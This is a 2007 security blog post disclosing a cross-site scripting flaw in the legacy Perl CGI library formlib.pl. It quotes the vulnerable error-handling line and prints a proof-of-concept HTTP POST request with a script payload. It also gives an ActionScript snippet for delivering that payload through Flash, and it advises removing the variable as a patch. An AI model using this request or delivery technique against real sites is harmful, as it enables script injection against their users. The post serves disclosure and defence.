Cenzic 232 Patent
Paid Advertising
web application security lab
« Mhtml Can Cause Internet Explorer 7.0 to Hang
DNS Pinning Doesn’t Exist in Flash »

formlib.pl Vulnerable to XSS

This post will be most likely lost on most of you but today I suddenly realized that formlib.pl is vulnerable to XSS. “What is formlib.pl?” you are probably asking yourself. It’s sort of one of the foundations of CGI programming that was one of the first things built to deal with dynamically generated webpages. It was the first CGI interface library written for PERL before PERL was really even an object oriented language. More code that uses it. Yup, it’s a blast from the past.

The only problem is there are some people (like myself) who still use it, because it’s so efficient. Of course I’ve hacked it up over the years by making it more efficient and easier to use etc… but I left in (in some format) the one vulnerable line of code:

&HtmlError("formlib.parse", "bjelli", "Error parsing $_, aborting.\n");

For those of you who can’t read PERL the $_ is an anonymous variable. If you can get it to error out you can get it to execute any JavaScript you like as long as it doesn’t have quotes in it. Here’s a way to get it to error out:

POST /cgi-bin/vulnerable.cgi HTTP/1.1
Host: www.vulnerable-site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: dbx-postmeta=grabit=0-,1-,2-,3-,4-,5-,6-&advancedstuff=0-,1-,2-
Content-type: application/x-www-form-urlencoded
Content-Length: 53

<script>alert(String.fromCharCode(88,83,83))</script>

Okay, how do we do that? Well here’s one way. Actionscript inside Flash allows us to do some pretty crazy things (I’m researching an old issue right now with Amit which is how I found this originally).

var req:XML=new XML('<script>alert(String.fromCharCode(88,83,83))</script>');
req.send("http://www.vulnerable-site.com/cgi-bin/vulnerable.cgi", "_self");

Anyway, like I said, this is probably lost on most people, but to me it was a big deal. I found eight places on this site alone that were vulnerable. If you are an old-school PERL hacker and you haven’t upgraded from formlib.pl to something like CGI.pm (despite that that module is bloat-ware) you probably should at least patch up by removing the “$_” from the script.

This entry was posted on Sunday, February 4th, 2007 at 6:30 pm and is filed under XSS, Webappsec. Responses are currently closed, but you can trackback from your own site.

2 Responses to “formlib.pl Vulnerable to XSS”

  1. Wladimir Palant Says:
    February 4th, 2007 at 7:04 pm

    Ah, nice to see you XSS’ing yourself with this snippet of ActionScript code. Maybe you should escape the HTML entities there :)

  2. RSnake Says:
    February 4th, 2007 at 7:41 pm

    Whoops, I just removed the output completely. I can’t use HTML entities because then I couldn’t enter the other HTML.  Anyway, yes, I fixed it.